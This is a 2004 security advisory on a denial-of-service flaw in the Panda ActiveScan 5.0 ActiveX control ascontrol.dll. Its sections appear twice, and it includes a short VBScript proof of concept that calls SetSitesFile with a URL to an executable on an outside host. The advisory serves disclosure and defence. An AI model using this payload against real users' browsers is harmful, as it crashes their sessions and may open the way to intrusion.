Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
BID:10067
Info
Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
| Bugtraq ID: | 10067 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 06 2004 12:00AM |
| Updated: | Apr 06 2004 12:00AM |
| Credit: | Discovery is credited to Rafel Ivgi, The-Insider <[email protected]>. |
| Vulnerable: |
Panda ActiveScan 5.0 |
| Not Vulnerable: | |
Discussion
Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting the 'InstallEngineCtl' object.
Panda ActiveScan 5.0 has been reported to be prone to this issue.
It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting the 'InstallEngineCtl' object.
Panda ActiveScan 5.0 has been reported to be prone to this issue.
Exploit / POC
Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
The following proof of concept has been supplied:
<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControls.InstallEngineCtl.1" )
mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
</script>
The following proof of concept has been supplied:
<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControls.InstallEngineCtl.1" )
mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
</script>
Solution / Fix
Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Panda ActiveScan ascontrol.dll Denial of Service Vulnerability
References:
References:
- Panda ActiveScan 5.0 - Remote Buffer Overflow and A Crash(D.O.S) ("Rafel Ivgi, The-Insider"
)